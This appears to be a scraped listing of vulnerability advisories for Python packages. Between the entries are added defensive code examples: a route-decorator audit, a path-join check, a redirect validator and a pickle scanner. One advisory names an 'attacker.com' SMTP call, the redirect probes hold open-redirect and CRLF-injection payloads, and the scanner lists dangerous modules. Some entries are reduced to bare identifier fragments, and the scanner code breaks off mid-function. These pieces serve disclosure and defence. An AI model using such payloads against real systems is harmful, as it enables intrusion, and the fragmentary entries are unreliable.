CVE-2026-35002 [CRITICAL] CVE-2026-35002 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35002 :
Python vulnerability analysis and mitigation
Agno versions prior to 2.3.24 contain an arbitrary code execution vulnerability in the model execution component that allows attackers to execute arbitrary Python code by manipulating the field_type parameter passed to eval(). Attackers can influence the field_type value in a FunctionCall to achieve remote code execution.
Source : NVD
## 9.3
Score
Published April 2, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.4
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
agno
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Apr 05, 20
Wiz
CVE-2026-22041 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-22041 [LOW] CVE-2026-22041 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22041 :
Python vulnerability analysis and mitigation
Logging Redactor is a Python library designed to redact sensitive data in logs based on regex patterns and / or dictionary keys. Prior to version 0.0.6, non-string types are converted into string types, leading to type errors in %d conversions. The problem has been patched in version 0.0.6. No known workarounds are available.
Source : NVD
## 2
Score
Published January 8, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
loggingredactor
Sources
NVD
pip Severity LOW Has Fix Added at: Jan
Wiz
CVE-2026-34730 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-34730 [MEDIUM] CVE-2026-34730 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34730 :
Python vulnerability analysis and mitigation
Copier is a library and CLI app for rendering project templates. Prior to version 9.14.1, Copier's _external_data feature allows a template to load YAML files using template-controlled paths. If untrusted templates are in scope, a malicious template can read attacker-chosen YAML-parseable local files that are accessible to the user running Copier and expose their contents in rendered output. This issue has been patched in version 9.14.1.
Source : NVD
## 5.5
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probab
Wiz
CVE-2026-35490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-35490 [CRITICAL] CVE-2026-35490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35490 :
Python vulnerability analysis and mitigation
## Summary
@login_optionally_required
@blueprint.route()
@route()
@route()
## Details
Correct order (used on 30+ routes):

```python
@blueprint.route('/settings', methods=['GET'])
@login_optionally_required
def settings():
    ...
```

Incorrect order (13 vulnerable routes):

```python
@login_optionally_required                # ← Applied to return value of @route, NOT the view
@blueprint.route('/backups/download/')    # ← Registers raw function
def download_backup(filename):
    ...
```

## POC

```
=== PHASE 1: Confirm Authentication is Required ===
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/
Main page: HTTP 302 -> http://127.0.0.1:5557/login?next=/
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/settings
Settings page: HTTP 302 (aut
```
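Why the decorator order matters, as an added example (not code from the affected project): a minimal stand-in for `flask.Blueprint` whose `route()` registers the function it receives and returns it unchanged, exactly as Flask does, so an auth decorator placed above `@route` wraps a function that is already registered bare. The second half is a small `ast` audit that flags every view where an auth decorator sits above the route decorator; the decorator names it looks for are assumptions.

```python
import ast
import functools


class Unauthorized(Exception):
    """Raised by the stand-in login decorator when no user is present."""


class Blueprint:
    """Constructed stand-in for flask.Blueprint. Like Flask, route() registers the
    function it is handed and returns that same function unchanged, so whatever
    wraps it afterwards is never what the router calls."""

    def __init__(self):
        self.view_functions = {}

    def route(self, rule, methods=("GET",)):
        def register(view):
            self.view_functions[rule] = view
            return view
        return register


def login_required(view):
    @functools.wraps(view)
    def wrapper(request, *args, **kwargs):
        if not request.get("user"):
            raise Unauthorized(view.__name__)
        return view(request, *args, **kwargs)
    return wrapper


bp = Blueprint()


@bp.route("/settings")           # correct: route registers the wrapped view
@login_required
def settings(request):
    return f"settings for {request['user']}"


@login_required                  # wrong: wraps the return value of route()...
@bp.route("/backups/download/")  # ...which has already registered the raw view
def download_backup(request):
    return "backup bytes"


def dispatch(rule, request):
    """Call the registered view the way the framework would."""
    return bp.view_functions[rule](request)


def requires_login(rule) -> bool:
    """True if an anonymous request to the registered view is refused."""
    try:
        dispatch(rule, {})
    except Unauthorized:
        return True
    return False


def _decorator_name(node):
    if isinstance(node, ast.Call):
        node = node.func
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return ""


def find_misordered_views(source, route_names=("route",),
                          auth_names=("login_required", "login_optionally_required")):
    """Static check: views whose auth decorator sits above the route decorator.
    ast lists decorators top to bottom; the top one is applied last."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        names = [_decorator_name(d) for d in node.decorator_list]
        auth = [i for i, n in enumerate(names) if n in auth_names]
        route = [i for i, n in enumerate(names) if n in route_names]
        if auth and route and min(auth) < min(route):
            findings.append((node.name, node.lineno))
    return findings


if __name__ == "__main__":
    print(dispatch("/backups/download/", {}))      # served with no login at all
    print(requires_login("/settings"))              # True
    with open(__file__) as f:
        print(find_misordered_views(f.read()))      # flags download_backup
```

Running the audit over a code base is cheap and catches the class, not the instance; a runtime test that hits every registered rule anonymously and expects a 302 or 401 is the complementary check.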
Wiz
GHSA-mhc9-48gj-9gp3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-mhc9-48gj-9gp3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-mhc9-48gj-9gp3 :
Python vulnerability analysis and mitigation
## Assessment
REDUCE
BUILD
## Original report
## Summary
is_likely_safe()
check_safety()
--check-safety
always_check_safety()
check_safety()
LIKELY_SAFE
socketserver.TCPServer
signal.signal
smtplib.SMTP
sqlite3.connect
## Details
The bypass exploits three weaknesses in fickling's static analysis pipeline:
likely_safe_imports
fickle.py:432-435
from smtplib import SMTP
"SMTP"
likely_safe_imports
smtplib
OvertlyBadEvals
analysis.py:301-310
likely_safe_imports
SMTP('attacker.com')
__setstate__
fickle.py:443-446
__setstate__
non_setstate_calls
OvertlyBadEvals
UnusedVariables
## Affected versions
All versions through 0.1.7 (latest as of 2026-02-18).
## Affected APIs
fickling.is_l
Wiz
CVE-2026-28490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-28490 [HIGH] CVE-2026-28490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28490 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a cryptographic padding oracle vulnerability was identified in the Authlib Python library concerning the implementation of the JSON Web Encryption (JWE) RSA1_5 key management algorithm. Authlib registers RSA1_5 in its default algorithm registry without requiring explicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that the underlying cryptography library implements correctly. This issue has been patched in version 1.6.9.
Source : NVD
## 8.3
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
MinimOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CI
Wiz
CVE-2026-25198 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-25198 [MEDIUM] CVE-2026-25198 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25198 :
Python vulnerability analysis and mitigation
web2py versions 2.27.1-stable+timestamp.2023.11.16.08.03.57 and prior contain an open redirect vulnerability. If this vulnerability is exploited, the user may be redirected to an arbitrary website when accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
Source : NVD
## 5.1
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
web2py
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 08, 2026
Wiz
CVE-2026-32640 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32640 [HIGH] CVE-2026-32640 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32640 :
Python vulnerability analysis and mitigation
SimpleEval is a library for adding evaluatable expressions into python projects. Prior to 1.0.5, objects (including modules) can leak dangerous modules through to direct access inside the sandbox if the objects you've passed in as names to SimpleEval have modules or other disallowed / dangerous objects available as attrs. Additionally, dangerous functions or modules could be accessed by passing them as callbacks to other safe functions to call. This vulnerability is fixed in 1.0.5.
Source : NVD
## 8.7
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release
Wiz
CVE-2026-33046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-33046 [HIGH] CVE-2026-33046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33046 :
Python vulnerability analysis and mitigation
XELATEX_PATH
indico.conf
podman
XELATEX_PATH
indico.conf
None
indico-uwsgi
indico-celery
Source : NVD
## 7.7
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
indico
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 24, 2026
Wiz
CVE-2025-68145 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.4
CVE-2025-68145 [MEDIUM] CVE-2025-68145 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68145 :
Python vulnerability analysis and mitigation
In mcp-server-git versions prior to 2025.12.17, when the server is started with the --repository flag to restrict operations to a specific repository path, it did not validate that repo_path arguments in subsequent tool calls were actually within that configured path. This could allow tool calls to operate on other repositories accessible to the server process. The fix adds path validation that resolves both the configured repository and the requested path (following symlinks) and verifies the requested path is within the allowed repository before executing any git operations. Users are advised to upgrade to 2025.12.17 upon release to remediate this issue.
Source : NVD
## 6.4
Score
Published December 17, 2025
Severit
Wiz
GHSA-mxhj-88fx-4pcv Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-mxhj-88fx-4pcv Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-mxhj-88fx-4pcv :
Python vulnerability analysis and mitigation
## Assessment
OBJ
NEWOBJ
NEWOBJ_EX
## Original report
## Summary
is_likely_safe()
check_safety()
--check-safety
always_check_safety()
check_safety()
LIKELY_SAFE
new_variable()
## Details
new_variable()
Obj.run()
fickle.py:1333-1350
fickle.py:1286-1301

```python
# Line 1300: call IS saved to module_body
var_name = interpreter.new_variable(call)
interpreter.stack.append(ast.Name(var_name, ast.Load()))
```

fickle.py:1333-1350

```python
# Line 1348: call is ONLY on the stack, NOT in module_body
interpreter.stack.append(ast.Call(kls, args, []))
```

ast.Call

```python
from smtplib import SMTP  # import present (from STACK_GLOBAL)
result = None             # no call to SMTP visible
```

SMTP('127.0.0.1')
fickle.py:1411-1420
fickle.py:1423-1433
cls._
Wiz
CVE-2026-34954 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-34954 [HIGH] CVE-2026-34954 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34954 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 1.5.95, FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. This issue has been patched in version 1.5.95.
Source : NVD
## 8.6
Score
Published April 3, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probabilit
Wiz
CVE-2026-21531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-21531 [CRITICAL] CVE-2026-21531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21531 :
Python vulnerability analysis and mitigation
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
Source : NVD
## 9.8
Score
Published February 10, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 64
Exploitation Probability (EPSS) 0.5
Affected packages and libraries
azure-ai-language-conversations-authoring
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Feb 15, 2026
Wiz
CVE-2026-1707 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-1707 [HIGH] CVE-2026-1707 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1707 :
Python vulnerability analysis and mitigation
\restrict
\unrestrict
Source : NVD
## 6.3
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 7.4
Affected Technologies
Python
pgAdmin
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:pgadmin:pgadmin:*:*:*:*:*:postgresql:*:*
pgadmin4-doc
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 08, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 08, 2026
Wiz
CVE-2026-1117 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-1117 [HIGH] CVE-2026-1117 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1117 :
Python vulnerability analysis and mitigation
lollms_generation_events.py
add_events
generate_text
cancel_generation
generate_msg
generate_msg_from
lollmsElfServer.busy
lollmsElfServer.cancel_gen
Source : NVD
## 8.2
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
lollms
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 03, 2026
Wiz
CVE-2026-22584 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-22584 [CRITICAL] CVE-2026-22584 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22584 :
Python vulnerability analysis and mitigation
Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files. This issue affects Uni2TS: through 1.2.0.
Source : NVD
## 9.8
Score
Published January 9, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
uni2ts
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Jan 22, 2026
Wiz
CVE-2026-27199 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-27199 [MEDIUM] CVE-2026-27199 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27199 :
Python vulnerability analysis and mitigation
Werkzeug is a comprehensive WSGI web application library. In versions 3.1.5 and below, the safe_join function allows Windows device names as filenames if preceded by other path segments. This was previously reported as GHSA-hgf8-39gv-g3f2, but the added filtering failed to account for the fact that safe_join accepts paths with multiple segments, such as example/NUL. The function send_from_directory uses safe_join to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely. This issue has been fixed in version 3.1.6.
Source : NVD
## 6.3
Score
Publis
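The point of CVE-2026-27199 is that the reserved-name check has to run on every path segment, not only the first. The block below is an added example, not Werkzeug's code: a device-name detector that also handles the `NUL.txt` / trailing-space spellings Win32 maps to the same device, and a lexical `safe_join` re-implementation in the same spirit as `werkzeug.security.safe_join` that applies the check per segment. The reserved-name set is the documented Win32 list; everything else is assumed.

```python
import posixpath
import re
from typing import Optional

# Win32 reserves these basenames in every directory; the extension and trailing
# spaces/dots are ignored by the OS, so 'NUL.txt' and 'nul ' open the device too.
# COM0 and LPT0 are not reserved.
WINDOWS_DEVICE_NAMES = frozenset(
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def segment_names_device(segment: str) -> bool:
    """Normalise one path segment the way Win32 does before comparing."""
    stem = segment.split(".", 1)[0].rstrip(" .").upper()
    return stem in WINDOWS_DEVICE_NAMES


def has_windows_device_name(path: str) -> bool:
    """True if ANY segment is a reserved device name ('example/NUL' included)."""
    return any(segment_names_device(seg) for seg in re.split(r"[\\/]+", path) if seg)


def safe_join(directory: str, *pathnames: str) -> Optional[str]:
    """Lexical join: None means refuse to serve. Rejects absolute parts, '..'
    escapes, backslashes and reserved device names in every segment."""
    parts = [directory]
    for filename in pathnames:
        if filename != "":
            filename = posixpath.normpath(filename)
        if ("\\" in filename or posixpath.isabs(filename)
                or filename == ".." or filename.startswith("../")):
            return None
        if has_windows_device_name(filename):
            return None
        parts.append(filename)
    return posixpath.join(*parts)


if __name__ == "__main__":
    for probe in ("example/NUL", "static/con.css", "logs/COM1.log", "null.txt", "reports/q1.pdf"):
        print(f"{probe!r:22} device={has_windows_device_name(probe)!s:5} join={safe_join('/srv/files', probe)}")
```

Rejecting device names on every platform, not just when `os.name == "nt"`, costs nothing and keeps the behaviour identical across a Linux test suite and a Windows deployment.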
Wiz
CVE-2026-27696 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-27696 [HIGH] CVE-2026-27696 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27696 :
Python vulnerability analysis and mitigation
is_safe_valid_url()
Source : NVD
## 8.6
Score
Published February 25, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
changedetection.io
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-29065 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-29065 [HIGH] CVE-2026-29065 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29065 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, a Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. This issue has been patched in version 0.54.4.
Source : NVD
## 8.8
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
changedetection.io
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 05, 2026
Wiz
CVE-2026-34052 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-34052 [MEDIUM] CVE-2026-34052 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34052 :
Python vulnerability analysis and mitigation
LTI JupyterHub Authenticator is a JupyterHub authenticator for LTI. Prior to version 1.6.3, the LTI 1.1 validator stores OAuth nonces in a class-level dictionary that grows without bounds. Nonces are added before signature validation, so an attacker with knowledge of a valid consumer key can send repeated requests with unique nonces to gradually exhaust server memory, causing a denial of service. This issue has been patched in version 1.6.3.
Source : NVD
## 5.9
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Pr
Wiz
CVE-2025-67502 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-67502 [MEDIUM] CVE-2025-67502 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67502 :
Python vulnerability analysis and mitigation
Taguette is an open source qualitative research tool. In versions 1.5.1 and below, attackers can craft malicious URLs that redirect users to arbitrary external websites after authentication. The application accepts a user-controlled next parameter and uses it directly in HTTP redirects without any validation. This can be exploited for phishing attacks where victims believe they are interacting with a trusted Taguette instance but are redirected to a malicious site designed to steal credentials or deliver malware. This issue is fixed in version 1.5.2.
Source : NVD
## 6.1
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CIS
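Both CVE-2026-25198 (web2py) and CVE-2025-67502 (Taguette) come down to a `next`-style parameter used in a redirect without validation. The added example below is not either project's code: a `safe_next()` that accepts only a same-origin path and a set of constructed probe values covering the spellings browsers treat as an external destination (`//host`, `///host`, backslash, scheme, CRLF).

```python
from urllib.parse import urlsplit, urlunsplit


def safe_next(next_value, default="/"):
    """Return a same-origin path to redirect to, or `default` when `next_value`
    could leave the site. The raw string is checked before parsing because
    browsers and urllib disagree on inputs such as '///evil' and '/\\evil'."""
    if not next_value:
        return default
    # Exactly one leading slash: rejects absolute URLs, '//host' (scheme-relative)
    # and '///host' (browsers collapse the extra slashes into an authority).
    if not next_value.startswith("/") or next_value.startswith("//"):
        return default
    # Backslashes are treated as slashes by browsers; control characters and
    # whitespace are stripped by some parsers or abused for header injection.
    if any(ch in next_value for ch in "\\\r\n\t ") or not next_value.isprintable():
        return default
    parts = urlsplit(next_value)
    if parts.scheme or parts.netloc:
        return default
    # Rebuild from components so only path, query and fragment survive.
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


# Constructed probe values -> expected outcome for a `next` parameter.
PROBES = {
    "/projects/3": "/projects/3",
    "/login?next=/a#b": "/login?next=/a#b",
    "//evil.example/": "/",
    "///evil.example": "/",
    "https://evil.example/x": "/",
    "/\\evil.example": "/",
    "javascript:alert(1)": "/",
    "/ok\r\nSet-Cookie: a=b": "/",
    "": "/",
}


def check_probes() -> dict:
    """Probes whose outcome differs from the expected value (empty when safe_next behaves)."""
    return {p: safe_next(p) for p, expected in PROBES.items() if safe_next(p) != expected}


if __name__ == "__main__":
    for probe, expected in PROBES.items():
        print(f"{probe!r:28} -> {safe_next(probe)!r}")
    print("mismatches:", check_probes())
```

Where the application must send users to a small number of external hosts (an LMS, an SSO provider), compare `parts.netloc` against an explicit allowlist instead of rejecting every authority; an allowlist of hosts is still a closed set, which is what makes this check sound.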
Wiz
CVE-2026-32716 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32716 [HIGH] CVE-2026-32716 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32716 :
Python vulnerability analysis and mitigation
SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the Enforcer incorrectly validates scope paths by using a simple prefix match (startswith). This allows a token with access to a specific path (e.g., /john) to also access sibling paths that start with the same prefix (e.g., /johnathan, /johnny), which is an Authorization Bypass. This issue has been patched in version 1.9.6.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected p
Wiz
GHSA-425g-fjhq-5h92 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-425g-fjhq-5h92 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-425g-fjhq-5h92 :
Python vulnerability analysis and mitigation
## Summary
openssl_encrypt/modules/json_validator.py
jsonschema
## Affected Code
```python
if not JSONSCHEMA_AVAILABLE:
    print(f"Warning: Cannot validate against schema '{schema_name}' - jsonschema library not available")
    return
```
additionalProperties: true
## Impact
An attacker who can influence the Python environment (remove the jsonschema package) or craft metadata with an unknown version number can bypass all schema checks. Malformed or malicious metadata will be accepted without validation.
## Recommended Fix
jsonschema
Or fail-closed: refuse to process metadata when validation cannot be performed
Reject unknown format versions instead of silently skipping validation
additionalProperties: false
## Fix
6e
Wiz
GHSA-4675-36f9-wf6r Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-4675-36f9-wf6r Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4675-36f9-wf6r :
Python vulnerability analysis and mitigation
## Summary
Picklescan doesn't flag the ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to:
Load DLLs
Call C functions directly
Manipulate memory raw pointers.
This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter-based Python sandboxes, as ctypes allows direct access to raw memory. This is a more severe loophole than normal gadget chains and bypasses, as raw memory access can be used for a lot of nefarious purposes down the line if left undetected.
## PoC
import pickle
im
Wiz
CVE-2026-32116 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32116 [HIGH] CVE-2026-32116 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32116 :
Python vulnerability analysis and mitigation
Magic Wormhole makes it possible to get arbitrary-sized files and directories from one computer to another. From 0.21.0 to before 0.23.0, receiving a file (wormhole receive) from a malicious party could result in overwriting critical local files, including ~/.ssh/authorized_keys and .bashrc. This could be used to compromise the receiver's computer. Only the sender of the file (the party who runs wormhole send) can mount the attack. Other parties (including the transit/relay servers) are excluded by the wormhole protocol. This vulnerability is fixed in 0.23.0.
Source : NVD
## 8.2
Score
Published March 12, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-22606 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22606 [HIGH] CVE-2026-22606 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22606 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python’s runpy module as unsafe. Because of this, a malicious pickle that uses runpy.run_path() or runpy.run_module() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologie
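The fickling and picklescan entries above (GHSA-mhc9-48gj-9gp3, GHSA-mxhj-88fx-4pcv, GHSA-4675-36f9-wf6r and CVE-2026-22606) are all gaps in what a static pickle scanner treats as dangerous. The added example below, written for this page and not taken from either tool, shows the core of such a scanner built on `pickletools.genops`: it recovers every `(module, name)` a pickle would import from both `GLOBAL` and `STACK_GLOBAL`, fails closed on an opcode shape it does not understand, and classifies with a dangerous-module list that includes `runpy`, `ctypes`, `smtplib`, `socketserver`, `signal` and `sqlite3`. The module lists and the sample payloads are constructed; the payload pickles are built with `pickle.dumps` and never loaded.

```python
import pickle
import pickletools

# Constructed deny list; any import that resolves into one of these packages makes
# the pickle OVERTLY_MALICIOUS regardless of what is done with it.
DANGEROUS_MODULES = frozenset({
    "os", "posix", "nt", "subprocess", "sys", "builtins", "importlib", "runpy",
    "ctypes", "socket", "socketserver", "smtplib", "signal", "sqlite3", "shutil",
    "pty", "webbrowser", "code", "codecs",
})
# Constructed allow list; anything not on it is at least SUSPICIOUS (fail closed).
ALLOWED_GLOBALS = frozenset({("collections", "OrderedDict"), ("builtins", "set"),
                             ("builtins", "frozenset"), ("builtins", "bytearray")})

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
# Bookkeeping opcodes that may sit between the two strings and STACK_GLOBAL.
TRANSPARENT_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT", "FRAME", "PROTO"}


def extract_globals(data: bytes) -> list:
    """Every (module, name) the pickle would import. GLOBAL/INST carry the pair
    inline; STACK_GLOBAL (protocol 4+) consumes the two strings pushed just before
    it. If those operands are not literal strings (e.g. fetched from the memo with
    a GET), this raises rather than guess."""
    found, recent = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent = (recent + [arg])[-2:]
        elif op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
            recent = []
        elif op.name == "STACK_GLOBAL":
            if len(recent) < 2:
                raise ValueError("STACK_GLOBAL operands are not literal strings")
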